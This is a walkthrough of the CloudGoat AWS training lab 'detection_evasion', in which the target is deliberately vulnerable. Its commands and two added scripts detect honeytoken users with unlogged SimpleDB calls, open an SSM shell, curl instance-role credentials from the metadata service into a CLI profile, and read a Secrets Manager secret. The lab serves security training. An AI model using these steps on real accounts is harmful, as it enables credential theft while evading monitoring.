CloudGoat AWS CTF solution - Scenario 11 (detection_evasion)
Scenario 11 - detection_evasion
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py config whitelist --auto
./cloudgoat.py create detection_evasion
Scenario Resources (High Level)
4 IAM Users
2 EC2 instances
2 SecretsManager secrets
A suite of detection mechanisms
Scenario Start(s)
4 pairs of IAM Credentials.
Scenario Goal(s)
The goal of this scenario is to read out the values for both secrets without being detected. The secrets are both stored in Secrets Manager, and their values have the following format (cg-secret-XXXXXX-XXXXXX).
Summary (TLDR setup below)
This scenario is significantly different from the CloudGoat scenarios that have come before in how it plays. In detection_evasion, your goals will be outlined for you more clearly, and the challenge is to complete them without triggering alarms. There is more setup involved in this scenario, and it will take longer to play (you might want/need to play it multiple times).
For starters, you will need to provide an email address to which cloudgoat can send email alerts. When/If you are detected by the automated mechanisms, an alert will be sent to this email address. If you don't want to use your standard email address, you can consider a service such as https://temp-mail.org/ or https://www.fakemail.net/.
After deployment is complete, you will need to wait about an hour before playing the scenario. This is, unfortunately, necessary for the CloudWatch alerts to fully integrate with CloudTrail logs. It should also be kept in mind that there can be a significant delay in alerts for actions that you take (10-15 minutes is not uncommon). So check your email periodically to see if you have triggered an alert.
TLDR Setup
- Set up a temporary email address if desired.
- Deploy the cloudgoat scenario. You will need to enter your email when prompted, and it will subsequently be stored in the "config.yml" file at the top level of the repo.
- Check your email address for SNS confirmation emails; there should be two. Confirm that you want to subscribe to the topics.
- Wait 30-60 minutes before working on the scenario. This is necessary because there is some lag between the time that terraform finishes deploying all resources and the time that your CLI actions will actually trigger the alerts that result in email notifications.
SPOILER ALERT: There are spoilers for the scenario below this point.
Exploitation Route
Walkthrough Overview â Easy Path
1. Discovering honey users-
We have been provided with 4 sets of credentials. To spot honey users we can inspect the full name of the IAM resource (the ARN). The ARN can be obtained by making any valid API call: if the user lacks the permission (honey users usually do), the AccessDenied error message echoes the caller's ARN. The catch is that CloudTrail may already be monitoring the API calls we would use for this, and honeytoken services alert on exactly that. So we need to call a service whose API calls are not recorded by CloudTrail; "aws sdb" (SimpleDB) API calls are not logged by CloudTrail, so we will use those-
a. Checking user_1 -
aws --profile user_1 sdb list-domains --region us-east-1
The above command reveals that user_1 is "user/canarytokens.com@@kz9r8ouqnhve4zs1yi4bzspzz". Such user names are generated by the third-party honeytoken service canarytokens.com.
We can also use Pacu's module ("iam__detect_honeytokens") for detecting this. In my case, Pacu generated email alerts when this module was used.
Therefore this is a honey user :(
b. Checking user_2 -
Similarly, for user_2 the ARN contains the unique identifier "spacecrab". A quick Google search revealed that this is also a deception tool (SpaceCrab).
aws --profile user_2 sdb list-domains --region us-east-1
Therefore this is a honey user :(
c. Checking user_3 -
This user is trickier: Pacu is unable to identify it as a honey user. But if we look at the user name, it looks like a UUID (a randomly generated unique string), which suggests the user was created automatically. The UUID format also matches that used by SpaceSiren.
aws --profile user_3 sdb list-domains --region us-east-1
Therefore this is a honey user :(
d. Checking user_4 -
aws --profile user_4 --region us-east-1 sdb list-domains
This command succeeds instead of returning an AccessDenied error, so user_4 actually has permissions on the sdb service and is therefore likely a legitimate user:
"arn:aws:iam::623845349649:user/r_waterhouse"
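The check above, automated as a small POSIX shell script. This is an added example, not part of the original walkthrough or of CloudGoat: each CLI profile is probed with the CloudTrail-unlogged `sdb list-domains` call, the ARN is pulled out of the AccessDenied message, and the user-name part of the ARN is matched against the three markers found above (canarytokens.com, spacecrab, and a bare UUID as used by SpaceSiren). The profile names, the account ID and the sample error text are constructed for illustration; "unknown" means only that none of these markers matched, not that the user is safe to use.

```shell
#!/bin/sh
# Added example (not CloudGoat's own code): honey-user triage for a list of CLI profiles.
# Probe call: "aws sdb list-domains" (not recorded by CloudTrail), per the walkthrough.

# Print the first IAM user ARN found in the text on stdin. The AccessDenied message
# has the form "User: arn:aws:iam::123456789012:user/name is not authorized to ...".
extract_arn() {
    grep -oE 'arn:aws:iam::[0-9]{12}:user/[^[:space:]"]+' | head -n 1
}

# Classify an IAM user ARN by its user name. Prints one of:
#   honey:canarytokens  - name contains canarytokens.com (Thinkst Canary tokens)
#   honey:spacecrab     - name contains spacecrab (Atlassian SpaceCrab)
#   honey:uuid          - name is a bare UUID, the format SpaceSiren uses
#   unknown             - no known marker matched; NOT proof that the user is legitimate
classify_arn() {
    name="${1##*:user/}"
    if printf '%s\n' "$name" | grep -qi 'canarytokens\.com'; then
        echo honey:canarytokens
    elif printf '%s\n' "$name" | grep -qi 'spacecrab'; then
        echo honey:spacecrab
    elif printf '%s\n' "$name" | grep -qiE '^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$'; then
        echo honey:uuid
    else
        echo unknown
    fi
}

# Probe one CLI profile. If the sdb call succeeds the user really holds SimpleDB
# permissions (as r_waterhouse did); otherwise the error text carries the ARN.
probe_profile() {
    profile="$1"
    if out=$(aws --profile "$profile" --region us-east-1 sdb list-domains 2>&1); then
        echo "$profile: sdb call allowed, no ARN in output; probably a real user"
    else
        arn=$(printf '%s\n' "$out" | extract_arn)
        if [ -z "$arn" ]; then
            echo "$profile: call failed without an ARN (bad credentials or network?): $out"
        else
            echo "$profile: $arn -> $(classify_arn "$arn")"
        fi
    fi
}

# Usage: ./probe.sh user_1 user_2 user_3 user_4   (profile names are assumed)
for p in "$@"; do
    probe_profile "$p"
done
```

Keep the marker list short and deliberate: every extra API call you make to "double-check" a suspicious user is another chance to trip an alert, which is why the script makes exactly one unlogged call per profile and does all further reasoning offline.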
2. Enumerating user permissions-
a. Running enumerate-iam against this user returned a huge list of allowed APIs; I skipped going through its results.
b. Checking whether our user is part of any group and, if so, which policies are attached-
i. Checking groups (the user turns out to be a member of cg-developers)-
aws --profile user_4 iam list-groups-for-user --user-name r_waterhouse
ii. Listing inline policies for group "cg-developers"-
aws --profile user_4 iam list-group-policies --group-name cg-developers
iii. Getting permissions for the "developer_policy" inline group policy-
aws --profile user_4 iam get-group-policy --group-name cg-developers --policy-name developer_policy
We can see that the policy grants us ssm permissions on the EC2 instances.
3. Listing ec2 instances-
aws --profile user_4 --region us-east-1 ec2 describe-instances
We found 2 EC2 instances: i-0e8c0209f9f189841 and i-0b90cd487675a2818 (public IP 54.152.116.179).
Only one of them has a public IP assigned, so we will try to get a shell on instance "i-0b90cd487675a2818". (Session Manager does not actually require a public IP; the instance only needs the SSM agent and outbound reachability to the SSM endpoints, so the other instance may be reachable the same way.)
4. Getting shell via ssm-
aws --profile user_4 --region us-east-1 ssm start-session --target "i-0b90cd487675a2818"
5. Getting the EC2 role's credentials from the instance metadata service (an IMDSv1-style request; if the instance enforces IMDSv2, a session token has to be fetched first)-
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/detection_evasion_cgid2wolmzzgua_easy
6. Enumerating permissions for the EC2 role-
Enumerating the role's permissions shows that it can list secrets in Secrets Manager. The credentials retrieved above are configured as the CLI profile ec2_role for the commands that follow.
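Steps 5 and 6 leave out how the metadata response becomes the `ec2_role` profile. The script below is an added example, not part of the original walkthrough or of CloudGoat: run inside the SSM session, it requests an IMDSv2 token first and falls back to the plain IMDSv1 request the walkthrough uses, discovers the attached role name instead of hard-coding it, and prints a ready-to-paste `~/.aws/credentials` section. Profile name, token TTL and the sample metadata document used for checking the parser are assumptions; no AWS API is called, so nothing here shows up in CloudTrail.

```shell
#!/bin/sh
# Added example (not CloudGoat's own code): instance-role credentials -> local CLI profile.
IMDS=http://169.254.169.254/latest

# Read one string field out of the flat JSON document the metadata service returns
# (one "Key" : "value" pair per line); avoids needing jq on the instance.
json_field() {
    # $1 = field name; JSON document on stdin
    sed -n "s/^[[:space:]]*\"$1\"[[:space:]]*:[[:space:]]*\"\([^\"]*\)\".*/\1/p" | head -n 1
}

# Convert the credentials JSON on stdin into an ~/.aws/credentials section named $1.
# Fails (exit 1) if any of the three required fields is missing.
json_to_profile_section() {
    doc=$(cat)
    key=$(printf '%s\n' "$doc" | json_field AccessKeyId)
    secret=$(printf '%s\n' "$doc" | json_field SecretAccessKey)
    token=$(printf '%s\n' "$doc" | json_field Token)
    [ -n "$key" ] && [ -n "$secret" ] && [ -n "$token" ] || return 1
    printf '[%s]\naws_access_key_id = %s\naws_secret_access_key = %s\naws_session_token = %s\n' \
        "$1" "$key" "$secret" "$token"
}

# GET a metadata path, adding the IMDSv2 token header when we have a token.
imds_get() {
    if [ -n "$IMDS_TOKEN" ]; then
        curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" "$IMDS/$1"
    else
        curl -s "$IMDS/$1"
    fi
}

# Fetch the credentials document for the attached instance role.
fetch_role_credentials() {
    # IMDSv2 token (PUT with a TTL header); empty if only IMDSv1 is available.
    IMDS_TOKEN=$(curl -s -X PUT "$IMDS/api/token" \
        -H 'X-aws-ec2-metadata-token-ttl-seconds: 300' 2>/dev/null || true)
    role=$(imds_get meta-data/iam/security-credentials/ | head -n 1)
    [ -n "$role" ] || { echo 'no instance role attached' >&2; return 1; }
    imds_get "meta-data/iam/security-credentials/$role"
}

# Usage on the instance: ./imds_profile.sh ec2_role   (then paste the output into
# ~/.aws/credentials on your own machine). Does nothing when run without arguments.
if [ "$#" -gt 0 ]; then
    fetch_role_credentials | json_to_profile_section "$1"
fi
```

The temporary credentials carry an expiry (the `Expiration` field), so if a later command suddenly fails with an expired-token error, rerun the script rather than assuming you have been locked out.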
7. Listing and reading secrets-
a. Listing secrets-
aws --region us-east-1 secretsmanager list-secrets --profile ec2_role
"arn:aws:secretsmanager:us-east-1:623845349649:secret:detection_evasion_cgid2wolmzzgua_hard_secret-u9Nc7c"
"arn:aws:secretsmanager:us-east-1:623845349649:secret:detection_evasion_cgid2wolmzzgua_easy_secret-0D0aJ8"
b. Reading secrets-
We were able to read only one of the two secrets (the easy one):
aws --profile ec2_role --region us-east-1 secretsmanager get-secret-value --secret-id "arn:aws:secretsmanager:us-east-1:623845349649:secret:detection_evasion_cgid2wolmzzgua_easy_secret-0D0aJ8"
cg-secret-889877-282341
References-
https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/detection_evasion/README.md